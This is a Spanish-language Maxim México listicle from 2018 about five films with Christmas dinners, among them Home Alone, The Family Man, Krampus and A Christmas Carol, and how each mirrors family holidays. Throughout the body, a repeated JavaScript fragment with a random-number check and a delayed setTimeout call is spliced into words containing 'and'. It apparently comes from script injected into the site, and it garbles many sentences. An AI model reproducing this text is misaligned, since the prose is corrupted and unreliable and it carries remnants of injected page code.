Las cinco cenas de Navidad en el cine que bien podrían suceder en tu familia | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Las cinco cenas de Navidad en el cine que bien podrían suceder en tu familia

    O quizá ya sucedieron.

    Autor: Yesica Flores 19 diciembre, 2018


    to-de-navidad-muppets.png» alt=»» width=»1440″ height=»773″ />
    The Muppet Christmas Carol (1992), Disney

     

     

     

    Nos han vendido, y mucho, la idea de que cualquier parecido del cine con la realidad es mera coincidencia, pero saben qué, no lo creo, NO ES MERA COINCIDENCIA.

     

    Si no me crees o piensas que exagero, solo hace falta ver estas propuestas cinematográficas para descubrir que varias de ellas podrían haber sido sacadas de nuestra vida, con situaciones divertidas o extravagantes que nos recuerdan la magia y el caos de la Navidad.

     

    Por ello hoy damos una vuelta pre-navideña una guía máxima donde disfrutar de estas películas nos prepara psicológicamente para sobrevivir las fechas, dándonos ideas prácticas para prevalecer durante esta cena del año.

     

     

     

    Mi Pobre Angelito (1990)

    via GIPHY

     

    Un niño pide un deseo para Navidad, quedarse solo en casa sin su escandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andalosa y ruidosa familia para pasar las fiestas; su deseo se cumple y aunque parezca que todo es diversión, el enfrentar una Navidad solo y los retos que conlleva lo hará extrañar a su caótica familia.

     

    ¿Por qué nos encanta?

    Porque sale fuera de los convencionalismos de este día, y si bien tiene planeada una cena de navidad conforme transcurre la velada, el protagonista de esta inolvidable cinta dejará de preocuparse por la cena navideña para idear un complicado plan que detendrá a los ladrones que quieren entrar a su casa.

     

    Refleja nuestra fortaleza interna, en medio de las situaciones graciosas que vemos en pantalla, seguimos siendo niños luchandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando contra nuestros demonios, un poco torpes.

     

     

     

     

    Por cierto, ¿ya vieron este comercial?

     

     

     

     

    Hombre de familia (2000)

    via GIPHY

     

    Un solitario hombre con un perfil muy importante de negocios evalúa su vida en la víspera de la Navidad, considerandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sus decisiones del pasado y el costo que tuvieron en su vida presente; esto hace que un espíritu lo lleve a conocer su vida familiar si hubiera tomado otras elecciones.

     

    ¿Por qué nos encanta?

    Porque nos plantea la idea de estar en un momento muy especial de la vida, en este caso la cena de navidad, y en vez de estar disfrutandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de las cosas que están sucediendo, el protagonista está pensandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en los «hubiera».

    De alguna forma todos en esos momentos nos preguntamos lo mismo.

     

    Refleja cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando estamos preguntándonos como hubiera sido nuestra vida si hubiéramos elegido otro camino, y el cómo esas elecciones hubieran tenido sus repercusiones, anhelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando siempre lo que no tenemos; pues esta cinta va un paso más allá para mostrarnos que lo que más importa es la familia, eso que a veces nos gustaría intercambiar a un genio de la lámpara mágica por millones, y finalmente terminaríamos extrañándolos.

     

     

     

     

     

    Krampus: El terror de la navidad (2015)

    via GIPHY

     

    Una familia se reúne para Navidad, pero la mala vibra que tienen todos contra todos, en vez de invocar al espíritu navideño, llama al Krampus para llevárselos a todos al infierno.

     

    ¿Por qué nos encanta?

     

    Porque es súper vintage, y evoca un poco el género slasher de los años ochenta con guiños a grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes clásicos del cine, pero lo más encantador, metafóricamente hablandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, es que esta cinta nos recuerda que a los que se portan mal, hay algo más que un carbón retorcido esperándoles.

    Muestra más que los horrores sociales de la Navidad, nos plantea una cena llena de situaciones incomodas, comentarios fuera de tono que nos recuerda cómo, más de una vez, no hemos sabido ser prudentes con nuestras emociones y sentimientos.

     

    Refleja como todas las familias, incluso las más perfectas, tienen sus trapitos sucios que salen en fechas importantes, y es en navidad cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando pasamos más tiempo del acostumbrado con la familia, que terminamos pensandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en ¿cómo es posible que seamos familiares?, ¿dónde está el error genético? En vez de gritarnos, odiarnos y ser medio hipócritas en Navidad, conviene mejor olvidar los conflictos y entregarnos al amor, antes de que el Krampus venga por nosotros.

     

     

     

     

     

     

    Cuento de Navidad 

    via GIPHY

     

    Este cuento de Charles Dickens probablemente ha sido una de las mayores adaptaciones que se han hecho de un libro a películas, no solo en live action y hasta Disney tiene una versión protagonizada por el Tío Rico McPato. Todas estas versiones hablan de lo mismo, un hombre rico y avaricioso que recibe la visita de 3 fantasmas que lo hacen recapacitar sobre su vida.

     

    ¿Por qué nos encanta?

    A pesar de que esta historia se escribió hace muchísimo tiempo, sigue siendo muy actual porque todos somos egoístas.

    Pero lo más interesante de esta cena navideña, es que su protagonista, después de vivir en una sola noche su pasado, su presente y su futuro, crea una gran catarsis que le permite tener la cena navideña que siempre ha deseado, compartiendo y disfrutandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando del verdadero sentido de la navidad.

     

    Refleja cómo todos estamos sumergidos en nuestras necesidades y solo pensamos en lo que queremos, lo que necesitamos y cómo hay que conseguirlo; pero además nos plantea una interesante pregunta filosófica sobre la consecuencia de nuestras acciones.

     

     

     

     

     

     

     

    Fiesta de Navidad en la oficina (2016)

    tonefilms-movie-kate-mckinnon-l0MYIUtKEoWwLpkgE»>via GIPHY

     

    El dueño de una empresa decide festejar a sus empleados con una épica fiesta de Navidad que nadie nunca olvidará.

     

    ¿Por qué nos encanta?

    Es la decadente fiesta a la cual todos queremos ir, para disfrutar de los excesos de la diversión mientras, claro, te apuntas para recibir el bono navideño por puntualidad.

     

    Refleja cómo a veces algunas fiestas de fin de año se salen de control mientras que la diversión va aumentandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, y como sin darte cuentas unos tragos demás se traducen en que terminas dedicándole una de Vicente Fernández a la compañera de contabilidad que te sonríe cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la miras. Es decir, estas fechas son para ser más libres que nunca.

     

     

     

     

    Todas estas cenas navideñas comparten algo en común, y es que la Cena de Navidad termina siendo acerca de todo, menos de lo que debería representar, en vez de pensar en la armonía, la felicidad y el amor por nuestros seres queridos, nos clavamos en los regalos, la comida y la diversión.

     

     

    Tal vez solo por una cena navideña deberíamos aprender las valiosas lecciones que nos ha regalado el cine con esas historias para tener una cena que en verdad refleje el espíritu navideño. Buen provecho y ¡feliz Navidad!

     

     

     

     

    Ahora es momento de aprender a preparar los mejores cocteles navideños.

     

     

     

     

     

O quizá ya sucedieron.